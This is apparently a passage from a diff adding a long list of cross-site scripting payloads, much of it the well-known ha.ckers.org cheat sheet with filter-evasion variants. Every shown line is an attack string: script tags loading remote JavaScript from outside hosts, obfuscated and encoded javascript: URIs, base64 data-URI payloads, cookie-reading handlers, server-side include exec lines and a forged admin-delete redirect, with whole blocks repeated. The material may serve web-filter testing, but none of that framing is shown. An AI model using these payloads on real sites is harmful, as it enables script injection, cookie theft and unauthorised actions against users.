<IMG SRC="jav
ascript:alert('XSS');">
|
|
511
|
+
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
|
512
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
513
|
+
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
514
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
515
|
+
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
516
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
517
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
|
518
|
+
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
519
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
520
|
+
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
521
|
+
\";alert('XSS');//
|
|
522
|
+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
523
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
524
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
525
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
|
526
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
|
527
|
+
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
|
528
|
+
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
529
|
+
<IMG SRC="livescript:[code]">
|
|
530
|
+
<BODY ONLOAD=alert('XSS')>
|
|
531
|
+
<BGSOUND SRC="javascript:alert('XSS');">
|
|
532
|
+
<BR SIZE="&{alert('XSS')}">
|
|
533
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
534
|
+
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
535
|
+
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
536
|
+
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
537
|
+
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
538
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
539
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
540
|
+
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
541
|
+
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
542
|
+
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
543
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
544
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
545
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
546
|
+
<XSS STYLE="behavior: url(xss.htc);">
|
|
547
|
+
¼script¾alert(¢XSS¢)¼/script¾
|
|
548
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
549
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
550
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
551
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
552
|
+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
|
553
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
554
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
555
|
+
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
|
556
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
557
|
+
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
558
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
559
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
560
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
561
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
562
|
+
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
|
563
|
+
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
564
|
+
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
565
|
+
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
566
|
+
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
567
|
+
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
568
|
+
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
569
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
570
|
+
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
571
|
+
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
572
|
+
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
573
|
+
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
574
|
+
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
575
|
+
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
576
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
577
|
+
<A HREF="http://66.102.7.147/">XSS</A>
|
|
578
|
+
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
|
579
|
+
<A HREF="http://1113982867/">XSS</A>
|
|
580
|
+
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
|
581
|
+
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
|
582
|
+
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
|
|
583
|
+
<iframe %00 src="	javascript:prompt(1)	"%00>
|
|
584
|
+
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
|
585
|
+
<input/onmouseover="javaSCRIPT:confirm(1)"
|
|
586
|
+
<sVg><scRipt %00>alert(1) {Opera}
|
|
587
|
+
<img/src=`%00` onerror=this.onerror=confirm(1)
|
|
588
|
+
<form><isindex formaction="javascript:confirm(1)"
|
|
589
|
+
<img src=`%00`
 onerror=alert(1)

|
|
590
|
+
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
|
591
|
+
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
|
592
|
+
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
|
593
|
+
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
|
594
|
+
"><h1/onmouseover='\u0061lert(1)'>%00
|
|
595
|
+
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
|
596
|
+
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|
597
|
+
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
|
598
|
+
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
|
599
|
+
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|
600
|
+
<iframe src=javascript:alert(document.location)>
|
|
601
|
+
<form><a href="javascript:\u0061lert(1)">X
|
|
602
|
+
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
|
603
|
+
<img/	  src=`~` onerror=prompt(1)>
|
|
604
|
+
<form><iframe 	  src="javascript:alert(1)" 	;>
|
|
605
|
+
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
|
606
|
+
http://www.google<script .com>alert(document.location)</script
|
|
607
|
+
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
|
608
|
+
<img/src=@  onerror = prompt('1')
|
|
609
|
+
<style/onload=prompt('XSS')
|
|
610
|
+
<script ^__^>alert(String.fromCharCode(49))</script ^__^
|
|
611
|
+
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
|
612
|
+
�</form><input type="date" onfocus="alert(1)">
|
|
613
|
+
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
|
614
|
+
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
|
615
|
+
<iframe srcdoc='<body onload=prompt(1)>'>
|
|
616
|
+
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
|
617
|
+
<script ~~~>alert(0%0)</script ~~~>
|
|
618
|
+
<style/onload=<!--	> alert (1)>
|
|
619
|
+
<///style///><span %2F onmousemove='alert(1)'>SPAN
|
|
620
|
+
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
|
621
|
+
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
|
622
|
+
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
|
623
|
+
<marquee onstart='javascript:alert(1)'>^__^
|
|
624
|
+
<div/style="width:expression(confirm(1))">X</div> {IE7}
|
|
625
|
+
<iframe/%00/ src=javaSCRIPT:alert(1)
|
|
626
|
+
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
|
627
|
+
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
|
628
|
+
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
|
629
|
+
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
|
630
|
+
<a/href="javascript: javascript:prompt(1)"><input type="X">
|
|
631
|
+
</plaintext\></|\><plaintext/onmouseover=prompt(1)
|
|
632
|
+
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
|
633
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
634
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
635
|
+
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
636
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
637
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
638
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
639
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>
|
|
640
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
641
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
642
|
+
<%<!--'%><script>alert(1);</script -->
|
|
643
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
644
|
+
<iframe/src \/\/onload = prompt(1)
|
|
645
|
+
<iframe/onreadystatechange=alert(1)
|
|
646
|
+
<svg/onload=alert(1)
|
|
647
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
648
|
+
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
|
649
|
+
http://www.<script>alert(1)</script .com
|
|
650
|
+
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
|
651
|
+
<svg><script ?>alert(1)
|
|
652
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
653
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
654
|
+
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
655
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
|
656
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
657
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
|
658
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
659
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
660
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
661
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
662
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
663
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
|
664
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
665
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
666
|
+
<body/onload=<!-->
alert(1)>
|
|
667
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script
|
|
668
|
+
<img src ?itworksonchrome?\/onerror = alert(1)
|
|
669
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
670
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
671
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
672
|
+
<script x> alert(1) </script 1=2
|
|
673
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
674
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
675
|
+
<script/src=data:text/javascript,alert(1)></script>
|
|
676
|
+
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
|
677
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
678
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
679
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
680
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
|
681
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
682
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
683
|
+
‘; alert(1);
|
|
684
|
+
‘)alert(1);//
|
|
685
|
+
<ScRiPt>alert(1)</sCriPt>
|
|
686
|
+
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
|
|
687
|
+
<IMG SRC=”javascript:alert(‘XSS’);”>
|
|
688
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
689
|
+
<IMG SRC=javascript:alert(‘XSS’)>
|
|
690
|
+
<img src=xss onerror=alert(1)>
|
|
691
|
+
<iframe %00 src="	javascript:prompt(1)	"%00>
|
|
692
|
+
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
|
693
|
+
<input/onmouseover="javaSCRIPT:confirm(1)"
|
|
694
|
+
<sVg><scRipt %00>alert(1) {Opera}
|
|
695
|
+
<img/src=`%00` onerror=this.onerror=confirm(1)
|
|
696
|
+
<form><isindex formaction="javascript:confirm(1)"
|
|
697
|
+
<img src=`%00`
 onerror=alert(1)

|
|
698
|
+
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
|
699
|
+
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
|
700
|
+
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
|
701
|
+
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
|
702
|
+
"><h1/onmouseover='\u0061lert(1)'>%00
|
|
703
|
+
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
|
704
|
+
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|
705
|
+
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
|
706
|
+
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
|
707
|
+
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|
708
|
+
<iframe src=javascript:alert(document.location)>
|
|
709
|
+
<form><a href="javascript:\u0061lert(1)">X
|
|
710
|
+
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
|
711
|
+
<img/	  src=`~` onerror=prompt(1)>
|
|
712
|
+
<form><iframe 	  src="javascript:alert(1)" 	;>
|
|
713
|
+
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
|
714
|
+
http://www.google<script .com>alert(document.location)</script
|
|
715
|
+
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
|
716
|
+
<img/src=@  onerror = prompt('1')
|
|
717
|
+
<style/onload=prompt('XSS')
|
|
718
|
+
<script ^__^>alert(String.fromCharCode(49))</script ^__^
|
|
719
|
+
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
|
720
|
+
�</form><input type="date" onfocus="alert(1)">
|
|
721
|
+
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
|
722
|
+
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
|
723
|
+
<iframe srcdoc='<body onload=prompt(1)>'>
|
|
724
|
+
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
|
725
|
+
<script ~~~>alert(0%0)</script ~~~>
|
|
726
|
+
<style/onload=<!--	> alert (1)>
|
|
727
|
+
<///style///><span %2F onmousemove='alert(1)'>SPAN
|
|
728
|
+
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
|
729
|
+
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
|
730
|
+
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
|
731
|
+
<marquee onstart='javascript:alert(1)'>^__^
|
|
732
|
+
<div/style="width:expression(confirm(1))">X</div> {IE7}
|
|
733
|
+
<iframe/%00/ src=javaSCRIPT:alert(1)
|
|
734
|
+
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
|
735
|
+
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
|
736
|
+
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
|
737
|
+
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
|
738
|
+
<a/href="javascript: javascript:prompt(1)"><input type="X">
|
|
739
|
+
</plaintext\></|\><plaintext/onmouseover=prompt(1)
|
|
740
|
+
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
|
741
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
742
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
743
|
+
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
744
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
745
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
746
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
747
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>
|
|
748
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
749
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
750
|
+
<%<!--'%><script>alert(1);</script -->
|
|
751
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
752
|
+
<iframe/src \/\/onload = prompt(1)
|
|
753
|
+
<iframe/onreadystatechange=alert(1)
|
|
754
|
+
<svg/onload=alert(1)
|
|
755
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
756
|
+
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
|
757
|
+
http://www.<script>alert(1)</script .com
|
|
758
|
+
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
|
759
|
+
<svg><script ?>alert(1)
|
|
760
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
761
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
762
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
|
763
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
764
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
|
765
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
766
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
767
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
768
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
769
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
770
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
|
771
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
772
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
773
|
+
<body/onload=<!-->
alert(1)>
|
|
774
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script
|
|
775
|
+
<img src ?itworksonchrome?\/onerror = alert(1)
|
|
776
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
777
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
778
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
779
|
+
<script x> alert(1) </script 1=2
|
|
780
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
781
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
782
|
+
<script/src=data:text/javascript,alert(1)></script>
|
|
783
|
+
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
|
784
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
785
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
786
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
787
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
|
788
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
789
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
790
|
+
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
|
|
791
|
+
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
792
|
+
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
|
|
793
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
794
|
+
<IMG SRC=”jav ascript:alert(‘XSS’);”>
|
|
795
|
+
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
|
|
796
|
+
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
|
|
797
|
+
%253cscript%253ealert(1)%253c/script%253e
|
|
798
|
+
“><s”%2b”cript>alert(document.cookie)</script>
|
|
799
|
+
foo<script>alert(1)</script>
|
|
800
|
+
<scr<script>ipt>alert(1)</scr</script>ipt>
|
|
801
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
802
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
803
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
804
|
+
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
|
|
805
|
+
<BODY ONLOAD=alert(‘XSS’)>
|
|
806
|
+
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
|
|
807
|
+
<IMG SRC=”javascript:alert(‘XSS’)”
|
|
808
|
+
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
809
|
+
javascript:alert("hellox worldss")
|
|
810
|
+
<img src="javascript:alert('XSS');">
|
|
811
|
+
<img src=javascript:alert("XSS")>
|
|
812
|
+
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
813
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
814
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
815
|
+
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
|
816
|
+
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
817
|
+
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
818
|
+
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
819
|
+
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
820
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
821
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
822
|
+
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
823
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
|
|
824
|
+
<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
|
|
825
|
+
<script>alert("XSS");</script>&search=1
|
|
826
|
+
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
|
|
827
|
+
<h1><font color=blue>hellox worldss</h1>
|
|
828
|
+
<BODY ONLOAD=alert('hellox worldss')>
|
|
829
|
+
<input onfocus=write(XSS) autofocus>
|
|
830
|
+
<input onblur=write(XSS) autofocus><input autofocus>
|
|
831
|
+
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
|
832
|
+
<form><button formaction="javascript:alert(XSS)">lol
|
|
833
|
+
